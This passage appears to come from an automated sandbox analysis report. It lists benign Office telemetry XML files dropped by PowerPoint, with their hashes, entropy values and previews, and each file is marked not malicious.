                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150220" V="0" DC="SM" EN="Office.PowerPoint.PPT.ExpiredBeforeDriedDuration" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bcrhc" />.. <UTS T="2" Id="a80uq" />.. </S>.. <G>.. <S T="1">.. <F N="ClientID" />.. </S>.. </G>.. <C T="W" I="0" O="false" N="ClientID">.. <S T="1" F="ClientID" />.. </C>.. <C T="U32" I="1" O="false" N="CountExpiredBeforeDried">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="I64" I="2" O="false" N="MaxDuration">.. <A T="MAX">.. <S T="1" F="ExpiredToDriedTime (ms)" />.. </A>.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):5.041740598960227
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dSWGtrqOB1BjX2G19DjOU5s7n8CBE5vNn5zdq5n:cSWQuOvJ9XP5scFc
                                                                                                                              MD5:07C3762EE40B27DCFFE0E8857B95E3D1
                                                                                                                              SHA1:6C991B8C031C80A47DA850BDBB09D1DE8089EC24
                                                                                                                              SHA-256:41640D168720A6FD3A22366ED48D11B02D8C89F488CBFECA4715373F40EF1DDF
                                                                                                                              SHA-512:F5420D8FCB6F79838B8B7F248F73B7BE315F014C4ACF4B63DB7B1902580D6D461E7F60490ABEBA0720561F6FD3BFB778F92E8C4D3CCA51BCF8266832AEB4D69B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150221" V="1" DC="SM" EN="Office.PowerPoint.PPT.ProcessIncomingRealtimeMessages" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a80up" />.. </S>.. <C T="U32" I="0" O="false" N="PerformDurationMs">.. <S T="1" F="PerformDurationMs" />.. </C>.. <C T="U32" I="1" O="false" N="PerformCount">.. <S T="1" F="PerformCount" />.. </C>.. <C T="U32" I="2" O="false" N="SuccessCount">.. <S T="1" F="SuccessCount" />.. </C>.. <C T="U32" I="3" O="false" N="ContextMismatchCount">.. <S T="1" F="ContextMismatchCount" />.. </C>.. <C T="U32" I="4" O="false" N="StaleMonikerCount">.. <S T="1" F="StaleMonikerCount" />.. </C>.. <C T="U32" I="5" O="false" N="ErrorCount">.. <S T="1" F="ErrorCount" />.. </C>.. <C T="U32" I="6" O="false" N="ObjectNotFoundCount">.. <S T="1" F="ObjectNotFound" />.. </C>.. <C T="U32" I="7" O="false" N="CleanDurati
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1914
                                                                                                                              Entropy (8bit):5.082906286436789
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dEXr+tr2B1Bp02sG1rpOU5spn88Bxy1nVWvxmNrS5oxzn5zc35n:cxSvgkFP5sjBgVl5FE
                                                                                                                              MD5:DBD61E20207790FF617224050B56267E
                                                                                                                              SHA1:56D52E64A383529F53851C264DF257DA7A24768A
                                                                                                                              SHA-256:B7D75381906CABBE517C9EA8C9680323F7BA468C7FD86B11BD9B247DBB954AAE
                                                                                                                              SHA-512:57460096F294D7FB5260AB88A684A73C75D4CB6AE1F33487E0394306C401EEF6B3413BE97AD2B0BA841B224E131FD4325414C2805B43AD53989890AA138119DB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150222" V="1" DC="SM" EN="Office.PowerPoint.PPT.CleanRealtimeMessages" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbtj3" />.. </S>.. <C T="U32" I="0" O="false" N="Applied_PerformDurationMs">.. <S T="1" F="PerformDurationMs" />.. </C>.. <C T="U32" I="1" O="false" N="Applied_PerformCount">.. <S T="1" F="PerformCount" />.. </C>.. <C T="U32" I="2" O="false" N="Applied_SuccessCount">.. <S T="1" F="SuccessCount" />.. </C>.. <C T="U32" I="3" O="false" N="Applied_ContextMismatchCount">.. <S T="1" F="ContextMismatchCount" />.. </C>.. <C T="U32" I="4" O="false" N="Applied_StaleMonikerCount">.. <S T="1" F="StaleMonikerCount" />.. </C>.. <C T="U32" I="5" O="false" N="Applied_ErrorCount">.. <S T="1" F="ErrorCount" />.. </C>.. <C T="U32" I="6" O="false" N="Applied_ObjectNotFoundCount">.. <S T="1" F="ObjectNotFound" />.. </C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1467
                                                                                                                              Entropy (8bit):5.028871737902808
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dbtrqB1BjX2G19DjOU5s7n8OxEdNnVdq5:chWvJ9XP5s1MVY
                                                                                                                              MD5:9C4C16A8819034F2CFADC612536FB02A
                                                                                                                              SHA1:1ADC7F1E0F9F0C2464384C48C2D9A042D11D22F1
                                                                                                                              SHA-256:D37D2A486184F74DC3510B40A2428D1CF5A21AD2E19E58B924CFF7A3EFC22A7E
                                                                                                                              SHA-512:DA08D096B55C9A068498D1B026C6AEBEA2870B344CE1BFDDB95A3B43C585B5C6F751F0C865975B55C44FD124D7B7B4BBF6BBBFA390A9DC8DDEFF9F15B7A82552
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150224" V="1" DC="SM" EN="Office.PowerPoint.PPT.ReapplyRealtimeMessages" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a80uq" />.. </S>.. <C T="U32" I="0" O="false" N="PerformDurationMs">.. <S T="1" F="PerformDurationMs" />.. </C>.. <C T="U32" I="1" O="false" N="PerformCount">.. <S T="1" F="PerformCount" />.. </C>.. <C T="U32" I="2" O="false" N="SuccessCount">.. <S T="1" F="SuccessCount" />.. </C>.. <C T="U32" I="3" O="false" N="ContextMismatchCount">.. <S T="1" F="ContextMismatchCount" />.. </C>.. <C T="U32" I="4" O="false" N="StaleMonikerCount">.. <S T="1" F="StaleMonikerCount" />.. </C>.. <C T="U32" I="5" O="false" N="ErrorCount">.. <S T="1" F="ErrorCount" />.. </C>.. <C T="U32" I="6" O="false" N="ObjectNotFoundCount">.. <S T="1" F="ObjectNotFound" />.. </C>.. <C T="U32" I="7" O="false" N="CleanDurationMs">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2050
                                                                                                                              Entropy (8bit):4.940789708509866
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d4UqYr1/pSpXYgaaNxJ0JQLe5bgjxuPyx5Oxc1QN70Dl2u9VVl:cLVpSp1aYMWI2rGpZylZ9VVl
                                                                                                                              MD5:D3159E77DCBCCB2F06C63E62D77EAC20
                                                                                                                              SHA1:14F95D720E2147392C4D4B1E8EE8B535D4F9B52D
                                                                                                                              SHA-256:D281E8C1366C05F5FB0D4ABEF1D7AFED57CE7BB646EABD40EE94184B276C2C03
                                                                                                                              SHA-512:757D7D9C3E26CEE75EBCB667D3224BE2C368ECB0844B9327350E63BAA5A0691E5642EDE6B5B142DF7B7228E889CE15E74DD5301916A5241916488333FF09B9EB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150225" V="7" DC="SM" EN="Office.PowerPoint.PPT.RealtimeEditing.OutgoingMessageTimes" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bg761" />.. </S>.. <C T="U32" I="0" O="false" N="RevisionNumber">.. <S T="1" F="RevisionNumber" />.. </C>.. <C T="W" I="1" O="true" N="SenderClientId">.. <S T="1" F="ClientID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="Tcid">.. <S T="1" F="TCID" />.. </C>.. <C T="U32" I="3" O="true" N="StartToQueueMicrosec">.. <S T="1" F="StartToQueueMicrosec" M="Ignore" />.. </C>.. <C T="I64" I="4" O="true" N="InQueueMicrosec">.. <S T="1" F="InQueueMicrosec" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="QueueToSendMsgMicrosec">.. <S T="1" F="QueueToSendMsgMicrosec" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="SendMsgMicrosec">.. <S T="1" F="SendMsgMi
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2748
                                                                                                                              Entropy (8bit):4.923883496260181
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cX4ApSpAvXniujOzbLikeNrGWHek/vjltlq9VV+F:MYIRNrGMlsVVs
                                                                                                                              MD5:22A8FD0CE9CAAFC00CC5FE5E3CE2FDD6
                                                                                                                              SHA1:D56979D8EA19A27AA8319EECB559409115BE9765
                                                                                                                              SHA-256:BAF9DC54430466049A75FBA4DFED7D8AEBCF687525B2CB668D8CD7101585F241
                                                                                                                              SHA-512:23D50D0E80197483969E23543FBE41A2F04EA299C1C1A1BD1A0549A37A15D0154199C0B1381A3327202A1CBEEC59F91A418685B1DE8826A8BBD13A8E9FB4BD02
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150227" V="11" DC="SM" EN="Office.PowerPoint.PPT.RealtimeEditing.IncomingMessageTimes" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bf63s" />.. </S>.. <C T="U32" I="0" O="false" N="RevisionNumber">.. <S T="1" F="RevisionNumber" />.. </C>.. <C T="W" I="1" O="true" N="SenderClientId">.. <S T="1" F="ClientID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="Tcid">.. <S T="1" F="TCID" />.. </C>.. <C T="U32" I="3" O="true" N="ProcessTrigger">.. <S T="1" F="ProcessTrigger" M="Ignore" />.. </C>.. <C T="W" I="4" O="true" N="ProcessingResult">.. <S T="1" F="ProcessingResult" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="CommandPerformResult">.. <S T="1" F="CommandPerformResult" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="StartToQueueMicrosec">.. <S T="1" F="StartToQueueMicrose
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2158
                                                                                                                              Entropy (8bit):4.458146001921315
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d6urYrHgr+Wrtd08FwrNrxTvU8iAsU8jEd65Kld65KABg0Mcec9eeVLDvhERb8Y:czc0/BSVZtvUesUmEJMekeeVLDvCbAI
                                                                                                                              MD5:AA9FA24A595BDBE9427888D6C9E4719A
                                                                                                                              SHA1:CE6D46739D044DD8F65DEAAC79ABFF4B3730E36D
                                                                                                                              SHA-256:3C9DFBF13F20F4682E726E66ED1BA26044EA444496D974A5BC7A06ADD33C30DF
                                                                                                                              SHA-512:2945D3D65F5C52E7A7FDE7C9D23DC805372E3DB3EF1BA38EF3889FAA75B6A187B36D0795887BB36258853CA03649886A976A369A404E49F716DD0C19B51D3101
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150228" V="0" DC="SM" EN="Office.PowerPoint.PPT.RealtimeCollabDataLoss" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="biqh1" />.. <UTS T="2" Id="bb8d5" />.. <UTS T="3" Id="bax11" />.. <F T="4">.. <O T="GT">.. <L>.. <S T="3" F="SrcRevision" />.. </L>.. <R>.. <S T="3" F="MyWetRevision" />.. </R>.. </O>.. </F>.. <US T="5">.. <S T="4" />.. <S T="2" />.. </US>.. <UTS T="6" Id="a8a6u" />.. <UTS T="7" Id="biqh0" />.. <F T="8">.. <O T="EQ">.. <L>.. <S T="7" F="FExternal" M="Ignore" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. <F T="9">.. <O T="EQ">.. <L>.. <S T="7" F="FExternal" M="Ignore" />.. </L>.. <R>.. <V V="tr
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3864
                                                                                                                              Entropy (8bit):5.056407463460544
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cq62cnwOyCuotwrV0eMmWAXrwunuBQAFqd5agt8DzrA1Vb9SOQzT:wLJzLdaMrR
                                                                                                                              MD5:860EB8D441DDA01AFD5F0854F6F782A8
                                                                                                                              SHA1:8314FC02F958DC89EE11C31A2409759D943575D0
                                                                                                                              SHA-256:4EC89D2E3925DC12216F044A7DA51CF99F2209EFDCEF7A3FB4520E89DA7E39F8
                                                                                                                              SHA-512:B67CA56AAB687D3CD3B786D44EEE28B56F65801F6A75929FBF6D560A4DF136ED507CB32CB205DED588B198825A29743B353ED0F45DBAFEDFF674BAAF07DEE1F6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150232" V="1" DC="SM" EN="Office.PowerPoint.PPT.ShapeDiff.Download" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ShapeDiffTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Shape_Download_Add">.. <S T="1" F="SpDiff_D_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Shape_Download_Delete">.. <S T="1" F="SpDiff_D_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Shape_Download_Position">.. <S T="1" F="SpDiff_D_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Shape_Download_Content">.. <S T="1" F="SpDiff_D_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Shape_Download_Type">.. <S T="1" F="SpDiff_D_16" M="Ig
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3836
                                                                                                                              Entropy (8bit):5.055627476314231
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dwRx0cNtrmPnd51i1khcsFodF7PNM3m1EyFbbLGU6vPDA9SOWBOUD:cyx6XgujFKFD1Eyd2U689SOYT
                                                                                                                              MD5:7C95665408775A7898C02A4E8C8B8354
                                                                                                                              SHA1:48D1694589CD7097C36544102663439009E83ACA
                                                                                                                              SHA-256:ED09F8724674CC418461E6D23AD4EDFC2B9F489C25F29E6D8EE8491AB8FCC48D
                                                                                                                              SHA-512:6B369BEAB3E6669474AA012244B6647CEBD7E0B6CA0848330595FDA195F588A76EB1BBBD1EF3E6D76FB47E0FB99386D28A5A7EFF040C0392C4D002E6357DA052
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150233" V="1" DC="SM" EN="Office.PowerPoint.PPT.ShapeDiff.Working" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ShapeDiffTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Shape_Working_Add">.. <S T="1" F="SpDiff_W_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Shape_Working_Delete">.. <S T="1" F="SpDiff_W_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Shape_Working_Position">.. <S T="1" F="SpDiff_W_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Shape_Working_Content">.. <S T="1" F="SpDiff_W_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Shape_Working_Type">.. <S T="1" F="SpDiff_W_16" M="Ignore"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2423
                                                                                                                              Entropy (8bit):5.0365242359372635
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d3KrtrmP5l56zyDJ1eIOQG1puYajCtcC4FtQAajhmN+O6o3Fj6LeScfFcKs5UD:cMC6ebexQGaFYfC2fIIMVjJsK
                                                                                                                              MD5:819167BC38717D5F6F7A296F2AD4FC9A
                                                                                                                              SHA1:BD8A309E8C9E3A7A9EE01F9DB5A779C1324BF08D
                                                                                                                              SHA-256:8DDF205FFA9BD8D7A1BD7FAD5DD0E8CA8E28B1FD8F284E4126B074CBA2ACFB7A
                                                                                                                              SHA-512:15FF7D77F179AF9FA28F90BB31F7AD5C988C5950C98CAE52651972A4ACA35501B5DBFB73F9630E748E4D6F1191CF436571EE5B9C322123BBB7413CC2CEC8E315
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150234" V="1" DC="SM" EN="Office.PowerPoint.PPT.SlideDiff.Download" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Slide_Download_Add">.. <S T="1" F="SldDiff_D_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Slide_Download_Delete">.. <S T="1" F="SldDiff_D_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Slide_Download_Background">.. <S T="1" F="SldDiff_D_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Slide_Download_Shapes">.. <S T="1" F="SldDiff_D_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Slide_Download_ColorScheme">.. <S T="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2408
                                                                                                                              Entropy (8bit):5.050759692222842
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dcEcNtrmP5l560t1eaP1rjMcCMMtReDPN+FoN4dwucfFcKs5UD:cWC60Tea9vMfMMverICN4WsK
                                                                                                                              MD5:41E79E5A54C4D8FDD12C68D58CC7392D
                                                                                                                              SHA1:85369DE5B63C07CA0C59DD7E69DA7E57352874D0
                                                                                                                              SHA-256:84704E83B2BFB8EA7BCF623D7C3056BC44B1AB3CFF2F57357D5F04FA03C11186
                                                                                                                              SHA-512:4FE4BAEFF880EAB6253347216CF1AEEC42E58B54EB95C36178E8C189F7A8568B7707AC71D6FA8632D2981E7BA2BEFBB3BA8217BB63F18CFF0CAFA8E52F01AF07
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150235" V="1" DC="SM" EN="Office.PowerPoint.PPT.SlideDiff.Working" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Slide_Working_Add">.. <S T="1" F="SldDiff_W_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Slide_Working_Delete">.. <S T="1" F="SldDiff_W_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Slide_Working_Background">.. <S T="1" F="SldDiff_W_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Slide_Working_Shapes">.. <S T="1" F="SldDiff_W_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Slide_Working_ColorScheme">.. <S T="1" F="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1732
                                                                                                                              Entropy (8bit):5.093509787046252
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d7rtrmP5l5b+61fEdfMOFOczQfwqDQUD:cNCr8on
                                                                                                                              MD5:563755C92A78D14CC3DD0E3E7E116648
                                                                                                                              SHA1:F60095BE27622AC928BC6AAFF0A7BC01EFEC5AF4
                                                                                                                              SHA-256:667321A58B34BACEB984A3A87FEC4E000E5AFAD77DFCA8311FEE79DF17E14569
                                                                                                                              SHA-512:FE752858A772A481601FC3E85042CCF6E0D468D1C24BC14CE94758B30F31D5C56AA66E26AD981C464990109B02A0A79ECD29F876496BAA8EEB89D4DC0215E929
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150236" V="1" DC="SM" EN="Office.PowerPoint.PPT.TableDiff.Download" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Table_Download_Modified">.. <S T="1" F="TblDiff_D_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Table_Download_CellModified">.. <S T="1" F="TblDiff_D_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Table_Download_RowsModified">.. <S T="1" F="TblDiff_D_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Table_Download_ColumnsModified">.. <S T="1" F="TblDiff_D_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Table_Download_Sty
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1722
                                                                                                                              Entropy (8bit):5.1120057954624105
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd02McS/GbjWner1D0lVz5/lO69oUFp96eT74VTUN1xvaTee6RTyr3oT+IHsYp:2dicNtrmP5l5w611EonFc5Bs/GhUD
                                                                                                                              MD5:6D53EFD0B2C23D645EA0AE35912BE242
                                                                                                                              SHA1:7EE9200ED57061541A4FD22ABA461D7385787C13
                                                                                                                              SHA-256:CC0C46FE48FB2F39877D1F9BE3117046DF27BBD8B4DB0455394C6BF7BDDBA64A
                                                                                                                              SHA-512:785256DA7156B506A139FCC3327D90F133D9B5B35C413B2CD18DF944F0A759D946204EE2DF98EC53021BD7D116C294AC697559D2C2CB65F09BB18EA6AF85CAC0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150237" V="1" DC="SM" EN="Office.PowerPoint.PPT.TableDiff.Working" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Table_Working_Modified">.. <S T="1" F="TblDiff_W_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Table_Working_CellModified">.. <S T="1" F="TblDiff_W_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Table_Working_RowsModified">.. <S T="1" F="TblDiff_W_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Table_Working_ColumnsModified">.. <S T="1" F="TblDiff_W_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Table_Working_StyleModi
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1309
                                                                                                                              Entropy (8bit):5.0947499866925465
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdZ4cIg/GbjWner1D0lVz5/lO69oUFp9GmB4G6GN1xGMXKYIeGGYrGooXoIHsa:2dZ9IrtrmP5l5j1JzDHOeQxVUD
                                                                                                                              MD5:D04CD8A82A4A4528DD0D8BBF91097D01
                                                                                                                              SHA1:9F5EA7921C3AA17C04BC634BCEC48BC76F6F7CD7
                                                                                                                              SHA-256:481980102F12E3EDBF9EC164189DA7971007A133D5C59F4B27790C909381EBBA
                                                                                                                              SHA-512:735FE56E510B951A80588F70F65F08E2D916631FE0C10C7122F6B69E3F230F8C7B435F093054ACC3FBE3CFEBE9145A295225043BD5FB0CB59FCA47B4AA16D558
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150238" V="1" DC="SM" EN="Office.PowerPoint.PPT.SectionDiff.Download" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Section_Download_Add">.. <S T="1" F="SecDiff_D_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Section_Download_Delete">.. <S T="1" F="SecDiff_D_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Section_Download_Move">.. <S T="1" F="SecDiff_D_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Section_Download_Name">.. <S T="1" F="SecDiff_D_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Section_Download_SlideMove">.. <S T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1302
                                                                                                                              Entropy (8bit):5.098629857396343
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd7cacS/GbjWner1D0lVz5/lO69oUFp9GdTs74Gd9sUN1xGdvXseeGdVsyrGdX:2d4acNtrmP5l5IGR1cvrcqI9FebxVUD
                                                                                                                              MD5:2A7F9D1F9B8202F3FA0A68497F902576
                                                                                                                              SHA1:95FC86A68EBDFCA125F0906CD9C354208F0F510D
